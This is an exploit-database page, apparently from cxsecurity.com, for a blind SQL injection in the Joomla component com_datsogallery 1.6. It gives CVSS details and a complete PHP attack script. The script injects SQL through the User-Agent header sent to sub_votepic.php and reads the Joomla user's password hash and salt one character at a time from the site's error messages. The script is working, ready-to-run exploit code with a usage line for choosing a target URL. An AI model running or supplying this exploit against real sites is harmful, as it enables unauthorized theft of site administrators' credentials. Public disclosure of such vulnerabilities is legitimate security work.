Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit

2008-11-24 / 2008-11-25
Credit: toxa
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<? //Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+ //Greets: all members of antichat.ru & cih.ms //options set_time_limit(0); ignore_user_abort(1); $norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'; $url=$_GET['url']; $where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1'; $id=(!empty($_GET['id']))?$_GET['id']:'1'; //functions function send_xpl($url, $xpl){ global $id; $u=parse_url($url); $req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n"; $req.="Host: ".$u['host']."\r\n"; $req.="User-Agent: ".$xpl."\r\n"; $req.="Connection: Close\r\n\r\n"; $fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n"); fwrite($fs, $req); $res=fread($fs, 4096); fclose($fs); return $res; } function xpl($condition, $pos){ global $norm_ua; global $where; $xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*"; return $xpl; } //main echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>'; if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n"); send_xpl($url, $norm_ua); //get md5 for($i=0;$i<=32;$i++){ $buff=send_xpl($url,xpl('>58', $i)); if(preg_match('/Duplicate entry/', $buff)){ for($j=97;$j<=102;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=48;$j<=57;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } //check Joomla version $test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*"; $buff=send_xpl($url,$test); if(preg_match('/Duplicate entry/', $buff)) die($pass); //separator $pass.=':'; //get salt for($i=33;$i<=49;$i++){ $buff=send_xpl($url,xpl('>58', $i)); if(preg_match('/Duplicate entry/', $buff)){ $buff=send_xpl($url, xpl('>91',$i)); if(preg_match('/Duplicate entry/', $buff)){ for($j=97;$j<=122;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=65;$j<=90;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=48;$j<=57;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } echo $pass;


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top